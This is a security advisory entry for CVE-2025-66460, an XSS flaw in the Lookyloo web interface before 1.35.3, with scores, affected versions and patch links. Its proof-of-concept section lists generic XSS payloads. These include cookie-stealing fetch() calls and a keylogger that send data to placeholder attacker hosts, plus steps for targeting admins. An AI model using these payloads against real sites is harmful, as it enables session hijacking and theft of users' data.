Security Vulnerability Report
CVE-2025-66460 CVSS 6.1 MEDIUM

Published: 2025-12-02 19:15:53
Last Modified: 2025-12-05 14:57:46

Description

Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to 1.35.3, Lookyloo passed improperly escaped values to cells rendered in datatables using the orthogonal-data feature. It is definitely exploitable from the popup view, but it is most probably also exploitable in many other places. This vulnerability is fixed in 1.35.3.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:lookyloo:lookyloo:*:*:*:*:*:*:*:* - VULNERABLE
Lookyloo < 1.35.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-66460 PoC - Stored XSS via DataTables orthogonal-data -->
<!-- Target: Lookyloo < 1.35.3 -->

<!-- Method 1: Script tag injection -->
<script>alert(document.cookie)</script>

<!-- Method 2: Event handler injection -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Method 3: SVG-based injection -->
<svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.domain))>

<!-- Practical exploitation payload -->
<script>
// Cookie stealing and session hijacking
var cookies = document.cookie;
fetch('https://attacker-controlled-server.com/log?c=' + btoa(cookies));

// Keylogger example
document.addEventListener('keypress', function(e) {
  fetch('https://attacker-controlled-server.com/klog?k=' + e.key);
});
</script>

<!-- Exploitation steps:
1. Identify Lookyloo instance < 1.35.3
2. Find input fields that populate DataTables columns
3. Submit malicious payload in any user-controlled field
4. Wait for admin/user to view the data
5. XSS executes in victim's browser context -->

References

https://github.com/Lookyloo/lookyloo/commit/63b39311f6b251a671895d97174345faf1b18e6e (Patch)
https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-r93r-7jfr-99c3 (Patch, Vendor Advisory)

Weakness

CWE-79 (Cross-site Scripting)

CVSS 4.0 (Secondary)

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Record Status

Published: 2025-12-02T19:15:53.163
Last Modified: 2025-12-05T14:57:46.010
Status: Analyzed
CVSS 3.1 (Primary): exploitability score 2.8, impact score 2.7